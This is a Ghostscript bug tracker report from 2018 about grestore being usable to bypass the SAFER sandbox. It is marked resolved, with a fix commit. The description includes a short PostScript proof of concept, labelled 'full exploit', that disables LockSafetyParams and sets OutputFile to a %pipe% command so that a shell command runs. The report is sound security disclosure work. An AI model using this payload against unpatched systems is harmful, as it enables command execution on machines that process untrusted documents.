Bug 699687 - grestore can bypass SAFER
Summary: grestore can bypass SAFER
Status: RESOLVED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: General (show other bugs)
Version: unspecified
Hardware: PC Windows 7
: P4 normal
Assignee: Chris Liddell (chrisl)
QA Contact: gs-security
URL:
Keywords:
: 699697 (view as bug list)
Depends on:
Blocks:
 
Reported: 2018-08-29 07:01 UTC by Ken Sharp
Modified: 2018-12-18 11:37 UTC (History)
4 users (show)

See Also:
Customer:
Word Size: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Ken Sharp 2018-08-29 07:01:10 UTC
This has been moved from the never-ending bug #699654, the last comment in that thread demonstrates a similar issue to the original report, but using grestore instead of restore:

-------------------------------------------------------------------------------
GS>currentpagedevice wcheck ==
false
GS>currentpagedevice /HWResolution get wcheck ==
true

You can't def HWResolution (for example), but you can just put or astore into it. If you put some junk in there, then grestore doesn't work:

GS>a0
GS>currentpagedevice /HWResolution get 0 (foobar) put
GS>grestore
Error: /rangecheck in .installpagedevice

Then LockSafetyParams is false again:

GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
false


That doesnt work with save (only gsave), so full exploit:

a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
Comment 1 Ken Sharp 2018-09-01 10:16:55 UTC
*** Bug 699697 has been marked as a duplicate of this bug. ***
Comment 2 Ken Sharp 2018-09-01 10:33:04 UTC
I have a fix for this which I've asked Chris to review, especially to review any non-standard devices which might be vulnerable in the same way. I imagine we'll have a fix committed shortly.
Comment 3 Ken Sharp 2018-09-03 07:42:33 UTC
Commit 	7ba6d80c69f0c74601ffc1077d27e0d1a299e57f addresses this issue.